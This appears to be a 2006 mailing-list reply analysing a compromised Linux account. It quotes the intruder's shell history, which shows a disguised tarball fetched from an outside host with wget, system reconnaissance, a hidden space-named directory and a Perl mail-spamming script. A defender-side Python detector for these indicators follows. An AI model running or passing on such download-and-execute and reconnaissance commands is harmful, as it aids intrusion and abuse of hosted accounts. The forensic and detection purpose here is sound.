Re: What rootkit is this? sockd/ gpm imaps2
- From: Allen Kistler <ackistler@xxxxxxxxx>
- Date: Mon, 25 Sep 2006 18:24:20 GMT
robb@xxxxxxx wrote:
Anybody recognize those filenames? I found those in a compromised
account.
I just discovered this, and blocked access to the account... FWIW, I
got a nice trace of the activity in .bash_history:
wget www.telnet22.com/roxy.jpg
tar xvfz roxy.jpg
cd sockd
bash
w
uname -a
cat /etc/hosts
ls -la
cd public_html/
id
lsw -la
ls -la
touch index.html
ls -la
cd .directory
ls -la
cd ..
ls -la
exit
mkdir " "
cd " "
vi sendeb.pl
wget www.telnet22.com/s/msg.txt
vi users
perl sendeb.pl
exit
I've sent this to Bluehost, where telnet22.com is hosted. I found this
bad looking klogd message... can anybody interpret it for me?
telnet22.com appears to be shut down as a server, so it's worth giving
the hosting service kudos for taking action.
Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change ----------
Sep 22 13:15:08 neptune kernel: Inspecting /boot/System.map-2.6.5-7.257-default
Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from /boot/System.map-2.6.5-7.257-default.
Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel modules not enabled.
Running klogd as root with the -i or -I switch causes the kernel to
reload its symbols. "man klogd" for more info. It's proof that someone
was root.
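A small defender-side check for the two indicators discussed in this thread, added here as an example and not part of the original exchange: it scans syslog for the klogd symbol reload that only root can trigger, and scans a shell history for an archive fetched under an image extension and then untarred. The sample log and history lines are constructed from the values quoted above.

```python
import re

# Constructed sample syslog, modelled on the klogd lines quoted in the thread.
SAMPLE_SYSLOG = """\
Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change ----------
Sep 22 13:15:08 neptune kernel: Inspecting /boot/System.map-2.6.5-7.257-default
Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from /boot/System.map-2.6.5-7.257-default.
Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
Sep 22 13:15:09 neptune cron[2211]: (root) CMD (run-parts /etc/cron.hourly)
"""

# Constructed .bash_history, modelled on the one quoted in the thread.
SAMPLE_HISTORY = """\
wget www.telnet22.com/roxy.jpg
tar xvfz roxy.jpg
cd sockd
perl sendeb.pl
"""

STATE_CHANGE = re.compile(r"kernel: klogd \S+, -+ state change -+")
SYMBOL_LOAD = re.compile(r"kernel: Loaded (\d+) symbols from (\S+)")
NON_ARCHIVE_EXT = re.compile(r"\.(jpe?g|gif|png|txt)$", re.IGNORECASE)

def klogd_symbol_reloads(syslog_text):
    """Return (timestamp, host, symbol_count, map_path) for each klogd symbol
    reload. klogd re-reads System.map only when restarted or sent -i/-I, both
    of which require root, so an unexpected reload is worth correlating with
    logins and cron activity around the same time."""
    hits, pending = [], None
    for line in syslog_text.splitlines():
        ts, host = line[:15], line.split()[3]   # classic syslog: "Sep 22 13:15:07 host ..."
        if STATE_CHANGE.search(line):
            pending = (ts, host)
        m = SYMBOL_LOAD.search(line)
        if m and pending:
            hits.append((pending[0], pending[1], int(m.group(1)), m.group(2).rstrip(".")))
            pending = None
    return hits

def disguised_archives(history_text):
    """Flag files downloaded with a non-archive extension and then unpacked
    with tar, the "roxy.jpg" trick visible in the quoted history."""
    fetched, flagged = set(), []
    for cmd in history_text.splitlines():
        parts = cmd.split()
        if not parts:
            continue
        if parts[0] in ("wget", "curl"):
            fetched.add(parts[-1].rsplit("/", 1)[-1])
        elif parts[0] == "tar" and parts[-1] in fetched and NON_ARCHIVE_EXT.search(parts[-1]):
            flagged.append(parts[-1])
    return flagged
```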